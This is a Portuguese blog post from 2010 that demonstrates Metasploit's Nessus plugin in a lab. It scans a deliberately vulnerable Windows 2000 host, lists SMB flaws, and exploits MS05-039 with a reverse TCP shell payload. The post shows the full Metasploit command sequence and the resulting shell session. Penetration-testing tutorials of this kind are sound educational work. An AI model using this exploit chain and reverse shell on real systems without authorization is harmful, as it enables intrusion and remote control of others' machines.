Alexandro Silva: Brincando com o plugin do Nessus para o Metasploit

Alexandro Silva: Brincando com o plugin do Nessus para o Metasploit
28 de Setembro de 2010
Recentemente o desenvolvedor Zate Berg disponibilizou um plug-in do Nessus para o Metasploit Framework ele está disponivel na versão em desenvolvimento do MSF.

Para os testes utilizei o seguinte cenário:

* Host Debian com Nessus e Metasploit
* Host Alvo com Windows 2000 “bugado até a alma”

Inicialmente atualizei o MSF e o Nessus e depois parti para a diversão

cd /tmp/pentest_tools/trunk

svn update


/opt/nessus/sbin/nessus-service &


| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ — –=[ 592 exploits - 302 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10505 updated today (2010.09.28)


Diversão :)

Carregando o Nessus plug-in

msf> load nessus

[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus


msf> nessus_connect localhost:8834 ok

[+] Username:
[+] Password:
[*] Connecting to https://localhost:8834/ as alexos
[*] Authenticated

Listando as políticas existentes no Nessus

msf> nessus_policy_list

[+] Nessus Policy List

ID Name Owner visability
– —- —– ———-
1 attack alexos private

Iniciando a varredura

msf> nessus_scan_new 1 alexoscorelabs

[*] Creating scan from policy number 1, called “alexoscorelabs” and scanning
[*] Scan started. uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Finalizada a verredura é hora de checar o relatório

msf> nessus_report_hosts_ports af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8

[+] Host Info

Port Protocol Severity Service Name Sev 0 Sev 1 Sev 2 Sev 3
—- ——– ——– ———— —– —– —– —–
0 icmp 1 general 0 2 0 0
0 tcp 3 general 0 9 0 1
0 udp 1 general 0 1 0 0
21 tcp 3 ftp 1 4 2 2
135 tcp 3 epmap 1 1 0 1
135 udp 3 epmap? 0 0 0 1
137 udp 1 netbios-ns 0 1 0 0
139 tcp 1 smb 1 1 0 0
445 tcp 3 cifs 1 10 2 12
1025 tcp 3 dce-rpc 1 1 0 1
1028 udp 1 dce-rpc 0 1 0 0
5800 tcp 1 www 1 4 0 0
5801 tcp 1 www 1 3 0 0
5900 tcp 3 vnc 1 2 0 1
5901 tcp 1 vnc 1 3 0 0

Obtendo informações sobre as vulnerabilidades existentes na porta 445 ( smb ) do alvo

msf> nessus_report_host_detail 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

[+] Port Info

Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector
—- ——– ——– ———– —– ——– — ———– ———–
cifs (445/tcp) 1 10736 DCE Services Enumeration none . . None .
cifs (445/tcp) 1 10785 SMB NativeLanManager Remote System Information Disclosure none . . None .
cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .
cifs (445/tcp) 1 11011 SMB Service Detection none . . None .
cifs (445/tcp) 1 10395 SMB Shares Enumeration none . . None .
cifs (445/tcp) 1 26920 Windows SMB NULL Session Authentication none false CVE-1999-0519 None .
cifs (445/tcp) 1 17651 Obtains the password policy none . . None .
cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
cifs (445/tcp) 3 19407 MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check) 10.0 true CVE-2005-1984 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12209 MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check) 10.0 true CVE-2003-0533 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12054 MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check) 10.0 true CVE-2003-0818 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10859 SMB LsaQueryInformationPolicy Function SID Enumeration none true CVE-2000-1200 None .
cifs (445/tcp) 3 22194 MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) 10.0 true CVE-2006-3439 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 2 18602 SMB svcctl MSRPC Interface SCM Service Enumeration 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 2 18585 SMB Service Enumeration via \srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 26917 SMB Registry : Nessus Cannot Access the Windows Registry none . . None .
cifs (445/tcp) 3 18502 MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) 10.0 false CVE-2005-1206 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11835 MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check) 10.0 true CVE-2003-0715 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10860 SMB Use Host SID to Enumerate Local Users none true CVE-2000-1200 None .
cifs (445/tcp) 3 11808 MS03-026: Microsoft RPC Interface Buffer Overrun (823980) 10.0 true CVE-2003-0352 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11110 MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830) 7.5 true CVE-2002-0724 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Usando o MSF explorei a vulnerabilidade MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution

msf> use exploit/windows/smb/ms05_039_pnp

msf exploit(ms05_039_pnp)> set RHOST

msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp

msf exploit(ms05_039_pnp)> set LHOST

msf exploit(ms05_039_pnp)> exploit

[*] Started reverse handler on
[*] Connecting to the SMB service…
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:[\browser] …
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:[\browser] …
[*] Calling the vulnerable function…
[*] Sending stage (240 bytes) to
[*] Command shell session 1 opened ( -> at Tue Sep 28 17:24:01 -0300 2010
[*] Server did not respond, this is expected
[*] The server should have executed our payload

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.


C:\WINNT\system32> ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :

Estes MSF add-ons serão sempre bem-vindos, outra integração interessante é a do Metasploit com o Ethercap para testes de MITM.

